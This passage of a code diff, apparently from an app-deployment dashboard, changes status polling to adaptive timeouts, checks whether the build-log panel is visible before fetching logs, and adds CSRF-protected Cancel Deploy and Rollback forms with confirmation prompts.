+      if (this.showBuildLogs && this.$refs.buildLogsWrapper && this._isElementVisible(this.$refs.buildLogsWrapper)) {
+        this.fetchBuildLogs();
+      }
       this.fetchRecentDeployments();
     },
 
+    _isElementVisible(el) {
+      if (!el) return false;
+      // Check if element is in viewport (roughly)
+      const rect = el.getBoundingClientRect();
+      return rect.bottom > 0 && rect.top < window.innerHeight;
+    },
+
     async fetchAppStatus() {
       try {
         const res = await fetch(`/apps/${this.appId}/status`);
         const data = await res.json();
+        const wasDeploying = this.deploying;
         this.appStatus = data.status;
         this.deploying = Alpine.store("utils").isDeploying(data.status);
 
+        // Re-schedule polling when deployment state changes
+        if (this.deploying !== wasDeploying) {
+          this._schedulePoll();
+        }
+
         if (
           data.latestDeploymentID &&
           data.latestDeploymentID !== this.currentDeploymentId
@@ -429,7 +457,18 @@ document.addEventListener("alpine:init", () => {
       }
 
       this.fetchAppStatus();
-      setInterval(() => this.fetchAppStatus(), 1000);
+      this._scheduleStatusPoll();
+    },
+
+    _statusPollTimer: null,
+
+    _scheduleStatusPoll() {
+      if (this._statusPollTimer) clearTimeout(this._statusPollTimer);
+      const interval = this.isDeploying ? 1000 : 10000;
+      this._statusPollTimer = setTimeout(() => {
+        this.fetchAppStatus();
+        this._scheduleStatusPoll();
+      }, interval);
     },
 
     async fetchAppStatus() {
@@ -464,6 +503,7 @@ document.addEventListener("alpine:init", () => {
         // Update deploying state based on latest deployment status
         if (deploying && !this.isDeploying) {
           this.isDeploying = true;
+          this._scheduleStatusPoll(); // Switch to fast polling
         } else if (!deploying && this.isDeploying) {
           // Deployment finished - reload to show final state
           this.isDeploying = false;

templates/app_detail.html

@@ -40,6 +40,16 @@
                     <span x-text="deploying ? 'Deploying...' : 'Deploy Now'"></span>
                 </button>
             </form>
+            <form method="POST" action="/apps/{{.App.ID}}/deployments/cancel" class="inline" x-show="deploying" x-cloak x-data="confirmAction('Cancel the current deployment?')" @submit="confirm($event)">
+                {{ .CSRFField }}
+                <button type="submit" class="btn-danger">Cancel Deploy</button>
+            </form>
+            {{if .App.PreviousImageID.Valid}}
+            <form method="POST" action="/apps/{{.App.ID}}/rollback" class="inline" x-data="confirmAction('Roll back to the previous deployment?')" @submit="confirm($event)">
+                {{ .CSRFField }}
+                <button type="submit" class="btn-warning">Rollback</button>
+            </form>
+            {{end}}
         </div>
     </div>